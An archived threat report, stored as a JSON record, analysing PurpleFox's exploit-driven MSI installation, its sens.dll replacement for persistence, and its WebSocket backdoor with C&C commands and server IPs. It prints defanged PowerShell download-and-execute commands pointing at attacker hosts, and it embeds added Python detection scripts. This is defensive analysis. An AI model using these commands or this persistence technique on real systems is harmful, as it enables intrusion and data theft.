{
	"id": "6d9a6d18-cda8-42d3-902e-fa00e333638f",
	"created_at": "2026-04-10T03:21:15.555916Z",
	"updated_at": "2026-04-10T03:22:17.098866Z",
	"deleted_at": null,
	"sha1_hash": "ef2c11f4b7691e1641fb8d102693a19fdb8bc469",
	"title": "PurpleFox Adds New Backdoor That Uses WebSockets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1315493,
	"plain_text": "PurpleFox Adds New Backdoor That Uses WebSockets\r\nBy Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy ( words)\r\nPublished: 2021-10-19 · Archived: 2026-04-10 02:19:27 UTC\r\nCyber Threats\r\nIn September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a\r\nPurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added\r\nvulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.\r\nBy: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: 9 min (2529 words)\r\n \r\nSave to Folio\r\nIn September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a\r\nPurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added\r\nvulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.\r\nWe also found a new backdoor written in .NET implanted during the intrusion, which we believe is highly\r\nassociated with PurpleFox. This backdoor, which we call FoxSocket, leverages WebSockets to communicate with\r\nits command-and-control (C\u0026C) servers, resulting in a more robust and secure means of communication\r\ncompared to regular HTTP traffic.\r\nWe believe that this particular threat is currently being aimed at users in the Middle East. We first encountered this\r\nthreat via customers in the region. 
We are currently investigating whether it has been found in other parts of the world.\r\nIn this blog, we describe some of the observed modifications to the initial PurpleFox payloads, alongside the newly implanted .NET backdoor and the C\u0026C infrastructure serving its functionality.\r\nPurpleFox Capabilities and Technical Analysis\r\nPowerShell\r\nThe activity starts with either of the following PowerShell commands being executed:\r\n\"cmd.exe\" /c powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png\"\r\n\"cmd.exe\" /c powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http[:]//117.187.136.141[:]13405/57BC9B7E.Png');MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png\"\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 1 of 16\r\nThese commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of them located in China:\r\nTable 1. Location of PurpleFox servers\r\nCountry | Server count\r\nChina | 345\r\nIndia | 34\r\nBrazil | 29\r\nUnited States | 26\r\nOthers | 113\r\nThe fetched payload is a long script consisting of three components:\r\n1. Tater (Hot Potato – privilege escalation)\r\n2. PowerSploit\r\n3. Embedded exploit bundle binary (privilege escalation)\r\nThe script targets 64-bit systems. 
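The two downloader one-liners at the start of this section have a shape that process-creation telemetry can flag without any signature for the payload itself: a cmd.exe /c wrapper around powershell with -nop and -exec bypass, an in-memory IEX of a DownloadString() result, and a trailing MsiMake call against a second URL on the same host. The Python below is an added example written for this page, not code from the article or from Trend Micro. It scores constructed command lines modelled on the ones above (kept defanged, as the article prints them, and re-fanged before matching) and extracts the download URLs so the hosts can be compared with a hosting list such as Table 1. The indicator weights, the alert threshold and the benign third sample are assumptions.

```python
import re

# Constructed process-creation command lines modelled on the one-liners
# quoted in this section, kept defanged (hxxp, [:], [[:]]) the way the
# article prints them. The third line is a benign PowerShell use added
# for contrast.
SAMPLE_COMMANDS = [
    '''\"cmd.exe\" /c powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png\"''',
    '''\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))\"''',
    '''\"cmd.exe\" /c powershell -NoProfile -Command \"Get-Service | Where-Object Status -eq Running\"''',
]

# (name, regex, weight): the weights and the threshold are assumed values.
INDICATORS = [
    ('download_cradle', 'downloadstring\\(', 4),
    ('invoke_expression', '(?<![a-z])(iex|invoke-expression)(?![a-z])', 3),
    ('msi_install', '(?<![a-z])msimake(?![a-z])', 4),
    ('exec_bypass', '-exec(utionpolicy)? bypass', 2),
    ('no_profile', '-nop(rofile)?(?![a-z])', 1),
]
ALERT_THRESHOLD = 6

# A URL runs until whitespace, a quote or a closing parenthesis.
URL_RE = re.compile('https?://[^\\s\\x27\\x22\\)]+', re.IGNORECASE)


def refang(cmd):
    # Undo the defanging used in threat reports so the URL regex matches.
    cmd = cmd.replace('[[:]]', ':').replace('[:]', ':').replace('[.]', '.')
    return re.sub('hxxp', 'http', cmd, flags=re.IGNORECASE)


def analyse(cmd):
    # Score one command line and pull out the hosts it would download from.
    refanged = refang(cmd)
    hits = [(name, weight) for name, pattern, weight in INDICATORS
            if re.search(pattern, refanged, re.IGNORECASE)]
    urls = URL_RE.findall(refanged)
    score = sum(weight for _, weight in hits)
    return {
        'hits': [name for name, _ in hits],
        'score': score,
        'urls': urls,
        'hosts': sorted({u.split('/')[2] for u in urls}),
        'alert': score >= ALERT_THRESHOLD,
    }


if __name__ == '__main__':
    for cmd in SAMPLE_COMMANDS:
        result = analyse(cmd)
        print(result['score'], result['alert'], result['hosts'], result['hits'])
```

The score is additive on purpose: a lone -NoProfile is normal administration, while a download cradle feeding IEX is enough to alert on its own, and the MsiMake tail is what ties a hit to this particular PurpleFox stage.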
It starts by checking the Windows version and the applied hotfixes for the vulnerabilities it targets:\r\nWindows 7/Windows Server 2008: CVE-2020-1054 (KB4556836, KB4556843); CVE-2019-0808 (KB4489878, KB4489885, KB2882822)\r\nWindows 8/Windows Server 2012: CVE-2019-1458 (KB4530702, KB4530730)\r\nWindows 10/Windows Server 2019: CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)\r\nAfter selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary, passing the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.\r\nThe goal is to install the MSI package as an administrator without any user interaction.\r\nMSI Package\r\nThe MSI package starts by removing the following registry keys, which belong to old Purple Fox installations, if any are present:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\{ac00-ac10}\r\nIt then installs the components of the Purple Fox backdoor (dbcode21mk.log and setupact64.log) to the Windows directory. Afterward, it sets two registry values under the key “HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager”:\r\nAllowProtectedRenames to 0x1, and\r\nPendingFileRenameOperations to the following:\r\n\\??\\C:\\Windows\\AppPatch\\Acpsens.dll\r\n\\??\\C:\\Windows\\system32\\sens.dll\r\n\\??\\C:\\Windows\\AppPatch\\Acpsens.dll\r\n\\??\\C:\\Windows\\system32\\sens.dll\r\n\\??\\C:\\Windows\\setupact64.log\r\n\\??\\C:\\Windows\\system32\\sens.dll\r\nThese entries move sens.dll to C:\\Windows\\AppPatch\\Acpsens.dll and replace it with the installed file setupact64.log. Setting AllowProtectedRenames to 1 is what permits a pending rename to touch a protected system file such as sens.dll.\r\nThe MSI package then runs a .vbs script that creates a Windows firewall rule to block incoming connections on ports 135, 139, and 445. 
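The PendingFileRenameOperations mechanism above is worth checking directly, because the Session Manager (smss.exe) applies it early in boot, before services and security agents are running. The value is a REG_MULTI_SZ list read in (source, destination) pairs: an empty destination deletes the source, and a destination prefixed with ! overwrites an existing file; AllowProtectedRenames set to 1 lets such a rename touch a Windows-protected system file. The Python below is an added example for this page, not code from the article or from Trend Micro. It parses a constructed registry snapshot modelled on the description above (sens.dll moved aside into AppPatch, then the dropped setupact64.log renamed over sens.dll in system32) and reports any entry that moves a DLL out of, or a non-DLL onto, the system directories. The pairing order of the six values shown above, the benign entries, and the list of protected directories are assumptions; on a live host the values would come from winreg rather than from the dict.

```python
import ntpath

# Constructed snapshot of the two Session Manager values described in the
# article, shaped as winreg.QueryValueEx would return them (an int and a
# list of strings). The (source, destination) pairing below is an
# assumption about how the article's six values line up; the last two
# pairs are benign entries added for contrast.
SAMPLE_SESSION_MANAGER = {
    'AllowProtectedRenames': 1,
    'PendingFileRenameOperations': [
        '\\??\\C:\\Windows\\system32\\sens.dll',
        '\\??\\C:\\Windows\\AppPatch\\Acpsens.dll',
        '\\??\\C:\\Windows\\setupact64.log',
        '\\??\\C:\\Windows\\system32\\sens.dll',
        '\\??\\C:\\Program Files\\Vendor\\Helper.dll.pending',
        '!\\??\\C:\\Program Files\\Vendor\\Helper.dll',
        '\\??\\C:\\Windows\\Temp\\installer.tmp',
        '',
    ],
}

# Directories whose DLLs are loaded by services and so are worth guarding
# (assumed list; extend for the hosts you monitor).
PROTECTED_DIRS = ('c:\\windows\\system32', 'c:\\windows\\syswow64')


def normalise(path):
    # Strip the NT object-manager prefix and fold case for comparison.
    return path.lstrip('\\?').lower()


def parse_pending_renames(entries):
    # The REG_MULTI_SZ list is consumed in pairs. An empty destination
    # means delete; a leading '!' means MOVEFILE_REPLACE_EXISTING.
    ops = []
    for i in range(0, len(entries) - 1, 2):
        src, dst = entries[i], entries[i + 1]
        ops.append({
            'source': normalise(src),
            'destination': normalise(dst.lstrip('!')),
            'delete': dst == '',
            'replace_existing': dst.startswith('!'),
        })
    return ops


def audit_session_manager(values):
    # Returns (kind, source, destination) findings. Two patterns matter:
    # a DLL being moved out of a protected directory (the original being
    # parked aside), and a file that is not already a protected DLL being
    # renamed onto a protected DLL path (the replacement).
    findings = []
    for op in parse_pending_renames(values.get('PendingFileRenameOperations', [])):
        src, dst = op['source'], op['destination']
        src_protected = ntpath.dirname(src) in PROTECTED_DIRS
        dst_protected = ntpath.dirname(dst) in PROTECTED_DIRS
        if src_protected and src.endswith('.dll') and not dst_protected:
            findings.append(('moved_aside', src, dst))
        if dst_protected and dst.endswith('.dll') and not (src_protected and src.endswith('.dll')):
            findings.append(('replaced', src, dst))
    # Only meaningful together with a suspicious rename, since installers
    # also set this value legitimately.
    if findings and values.get('AllowProtectedRenames') == 1:
        findings.append(('allow_protected_renames', '1', 'protected files may be renamed at next boot'))
    return findings


if __name__ == '__main__':
    for finding in audit_session_manager(SAMPLE_SESSION_MANAGER):
        print(*finding)
```

Because the swap only happens at the next reboot, the window between the MSI run and the restart is the one chance to catch it from the registry alone; after the reboot the evidence is the service DLL whose hash no longer matches the Windows build, plus Acpsens.dll sitting in AppPatch.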
As a final step, the system is restarted so that the PendingFileRenameOperations take place and sens.dll is replaced, which makes the malware run as the System Event Notification Service (SENS).\r\nPurpleFox Backdoor\r\nThe installed malware is a DLL protected with VMProtect. Using the other data file installed by the MSI package, it unpacks and manually loads the DLLs that provide its functionality. It also carries a rootkit driver, likewise unpacked from the data file, which is used to hide its files, registry keys, and processes. The sample starts by copying itself to another file and installing a new service, then restores the original sens.dll. Afterward, it loads the driver to hide its files and registry keys, and then spawns a sequence of 32-bit processes into which it injects its code modules, as these are 32-bit DLLs.\r\nFigure 1. PurpleFox installation process\r\nWebSocket Backdoor\r\nInitial Delivery\r\nThe initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion attempts on the same compromised server. 
The Trend Micro Vision One™ platform flagged the following suspicious PowerShell commands:\r\n\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))\"\r\nFigure 2. Trend Micro Vision One alert for PowerShell commands\r\nWe analyzed the payloads hosted on these URLs, which were variations of 185[.]112.144.245/a/[1-9], and found all of them serving two variants of another PowerShell script that acts as the main downloader for the .NET backdoor.\r\nFigure 3. Contents of payload\r\nThe difference between the two observed PowerShell scripts was the Base64-encoded data passed as an argument to the .NET sample downloaded from 185[.]112[.]144[.]45/a/data and finally invoked with this configuration parameter. We found two different configuration parameters in use: we observed the first one on August 26 and the second one, with more domains embedded, on August 30. The decoded configuration parameters are shown in the following figures:\r\nFigure 4. 
August 26 configuration\r\nFigure 5. August 30 configuration\r\nThese configuration parameters are used by the .NET initialization routines to pick a C\u0026C server and to initialize the cryptographic functions for the C\u0026C channel. Aside from the configuration, the payload itself is retrieved from 185.112.144[.]45/a/data. We also found older variants dating back to June 22 that have fewer capabilities than the more recent ones.\r\nDuring the earliest iterations of deploying this backdoor, aligning with the creation date of the malicious domain advb9fyxlf2v[.]com, the configuration parameters contained a minimal number of subdomains for contacting the C\u0026C servers compared to the recent one.\r\nFigure 6. Backdoor configuration\r\n.NET Backdoor Obfuscation\r\nLet us start the analysis with the backdoor dropped on the SQL server. When decompiled, it yields obfuscated symbols, most of which cannot be restored to their original names. Merely making them human-readable is sufficient for basic static analysis, and sometimes some of the original names can be recovered.\r\nFigure 7. Cleaned classes and method names\r\nOne notable characteristic we rarely see in malware is the use of WebSocket communication to the C\u0026C servers, which provides an efficient bidirectional channel between the infected client and the server.\r\nWebSocket is a communication technology that allows streams of data to be exchanged between a client and a server over a single TCP session. 
This differs from traditional request/response protocols like HTTP, and it gives the threat actor a more covert alternative to HTTP request/response traffic, creating an opportunity for quieter exfiltration that is less likely to be detected.\r\nFigure 8. Traditional (left) and WebSocket techniques (right)\r\nThe backdoor initializes a WebSocket connection to its C\u0026C server and keeps it open by sending keepalive messages to maintain the TCP connection. Once this is established, a series of bidirectional messages is exchanged between the infected machine and the selected C\u0026C server to negotiate a session encryption key.\r\nFigure 9. TCP/IP exchanges between client and server\r\nExecution starts by initializing the WebSocket and registering four callback functions as handlers for the WebSocket events.\r\nFigure 10. Function for registering callback functions\r\nOne of the relevant callbacks is onOpen, which initializes the C\u0026C channel encryption parameters when the WebSocket connection first opens. As shown in the next section, this mainly implements the first Diffie-Hellman (DH) key exchange message with the C\u0026C server. On the other side, the onReceive handler processes and dispatches all commands received from the server once a secure channel is established, and it also handles updates of the session encryption key.\r\nKey Negotiations\r\nThe first key exchange with the C\u0026C server is carried out by the registered onOpen callback, as seen in Figure 11.\r\nFigure 11. onOpen function\r\nIt initializes the ECDH object with some parameters to start the shared secret negotiation. 
The ECDiffieHellmanKeyDerivationFunction property is then set to Hash. This property specifies the key derivation function that the ECDiffieHellmanCng class uses to convert the secret agreement into key material, so here a hash algorithm is used to generate the key material (instead of HMAC or TLS).\r\nAfterward, the client sends its PublicKey property, which is used on the C\u0026C side with another ECDiffieHellmanCng object to generate the shared secret agreement. This data is sent over the WebSocket as the first key exchange message. However, instead of sending it in cleartext, the client applies symmetric AES encryption to all communication over the WebSocket, including this first exchange; as no shared secret exists yet, the AES routine generates a default key for it. Since that default key is a constant embedded in the sample, the first exchange can be decrypted by anyone holding the binary; the confidentiality of the session rests on the ECDH-derived key that follows.\r\nFigures 12-13. Function and code for the AES encryption key\r\nAs a result, the key negotiation message is encrypted with AES using the shown parameters and a dummy 32-byte key (111…11), named byte_0 in the following debugging session, producing an AES ciphertext with a fixed length of 176 bytes.\r\nFigure 14. Structure of key exchange message\r\nThe 176 encrypted bytes are the actual data sent over the WebSocket, which marks the end of the first key exchange message.\r\nSecond Exchange (C\u0026C to Victim)\r\nThe second key exchange message is sent from the server to the client and is handled by the onReceive function, which is invoked by the message handler.\r\nFigure 15. Invoking the onReceive function\r\nThis AES-encrypted second exchange has a fixed length of 304 bytes.\r\nFigure 16. 
Contents of incoming message\r\nThe handler then checks whether this incoming message relates to control-plane key establishment or is an ordinary data command.\r\nIf it is the former, the first step is to remove the symmetric encryption on the C2 channel and then finalize the shared secret generation by handing execution to the ECDH derivation function method_7.\r\nFigure 17. Handoff to method_7 function\r\nThe client verifies the signed message using the RSA public key loaded from the configuration payload shown in the previous section. If the signature verifies, key material is derived from the DH exchange and saved as the permanent symmetric AES key (the Symmetric_AES_key variable), which is used for as long as the WebSocket channel is active.\r\nFigure 18. method_7 function\r\nThird Exchange (Victim to C\u0026C)\r\nOnce an encrypted session is established over the WebSocket, the client fingerprints the machine by collecting specific data (including the username, machine name, local IP, MAC address, and Windows version) and relays it over the secure channel so the victim can be profiled on the server side. This is the final exchange before the WebSocket channel is fully established; the client then listens for further commands, which are covered in the next section.\r\nAs the fingerprinting data collected differs from one execution environment to another, this message varies in length. In our lab analysis it was 240 bytes when encrypted with the newly generated shared secret key.\r\nFigure 19. 
Newly generated secret key\r\nAs long as the WebSocket is maintained with the keepalive messages shown earlier, the operators can signal any command to be executed, so what happens next depends mainly on the targeting and the actual motivation of the operator.\r\nWebSocket Commands\r\nIn this section, we cover some of the observed commands sent from the server. There are minor differences between variants with regard to the command numbers and the supported functionality.\r\nAll command handling is implemented in the main dispatch routine (except for command 160, which is used for key negotiation or renegotiation).\r\nTable 2. List of commands\r\nCommand code | Functionality\r\n20 | Sends the current date on the victim machine\r\n30 | Leaks DriveInfo.GetDrives() results for all drives\r\n40 | Leaks DirectoryInfo() results for a specific directory\r\n50 | FileInfo() results for a specific file\r\n60 | Recursive directory search\r\n70 | Executes WMI queries (ManagementObjectSearcher())\r\n80 | Closes the WebSocket session\r\n90 | Exits the process\r\n100 | Spawns a new process\r\n110 | Downloads more data from a specific URL to the victim machine\r\n120 | DNS lookup from the victim machine\r\n130 | Leaks specific file contents from the victim machine\r\n140 | Writes new content to a specific location\r\n150 | Downloads data, then writes it to a specific file\r\n160 | Renegotiates the session key for symmetric encryption\r\n180 | Gets the current process ID/name\r\n210 | Returns the configuration parameter for the backdoor\r\n220 | Kills the process, then starts a new process with a different config\r\n230 | Kills a specific process by PID\r\n240 | Queries internal backdoor object properties\r\n260 | Leaks hashes of specific requested files\r\n270 | Kills a list of PIDs\r\n280 | Deletes a list of requested files/directories\r\n290 | Moves a list of 
files/directories to another location\r\n300 | Creates a new directory at a specific location\r\nWebSocket C\u0026C Infrastructure\r\nAt the time of this writing, there were several active C\u0026C servers controlling the WebSocket clients. By profiling the infected targets and interacting through the different commands sent, we listed the observed IP addresses and the registered domains found in the PowerShell downloaders and the backdoor configuration parameters.\r\nTable 3. WebSocket C\u0026C servers (ASN as listed: AS 44925, 1984 ehf)\r\nIP address | Description | Notable activity\r\n185.112.144.245 | Hosting PS payloads (/a/[1-9]) and the .NET payload (/a/data) | Iraq, Saudi Arabia, Turkey, UAE\r\n185.112.147.50 | C\u0026C server | Turkey, US, UAE\r\n185.112.144.101 | C\u0026C server | Turkey\r\n93.95.226.157 | C\u0026C server | US\r\n93.95.228.163 | C\u0026C server | US\r\n93.95.227.183 | C\u0026C server | -\r\n93.95.227.169 | C\u0026C server | UAE\r\n93.95.227.179 | C\u0026C server | -\r\n185.112.146.72 | Potential C\u0026C server | -\r\n185.112.146.83 | Potential C\u0026C server | -\r\nThe backdoor picks one subdomain randomly from the configuration data and tries to connect via WebSocket. If it fails to connect on port 12345, it tries to resolve another subdomain.\r\nFigure 20. Random C\u0026C servers\r\nThe main domain advb9fyxlf2v[.]com used by these servers, registered on June 17, 2021, within days of the first observed variant, is mainly used for load balancing across the multiple active servers.\r\nConclusion\r\nThe rootkit capabilities of PurpleFox make it more capable of carrying out its objectives in a stealthier manner. They allow PurpleFox to persist on affected systems as well as deliver further payloads to them. We are still monitoring these new variants and their dropped payloads. 
The new .NET WebSocket backdoor (called FoxSocket, which we detect as Backdoor.MSIL.PURPLEFOX.AA) is being closely monitored to discover more information about this threat actor’s intentions and objectives.\r\nTrend Micro Solutions and Indicators of Compromise\r\nThe capabilities of the Trend Micro Vision One platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential exploitation attempts. The Trend Micro Vision One Workbench shows a holistic view of the activities observed in a user’s environment by highlighting important attributes related to the attack.\r\nTrend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing a 24/7 service that gives organizations a single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro’s wealth of global threat intelligence.\r\nAll IOCs related to this attack can be found in a separate file.\r\nSource: https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html"
	],
	"report_names": [
		"purplefox-adds-new-backdoor-that-uses-websockets.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775791275,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ef2c11f4b7691e1641fb8d102693a19fdb8bc469.pdf",
		"text": "https://archive.orkl.eu/ef2c11f4b7691e1641fb8d102693a19fdb8bc469.txt",
		"img": "https://archive.orkl.eu/ef2c11f4b7691e1641fb8d102693a19fdb8bc469.jpg"
	}
}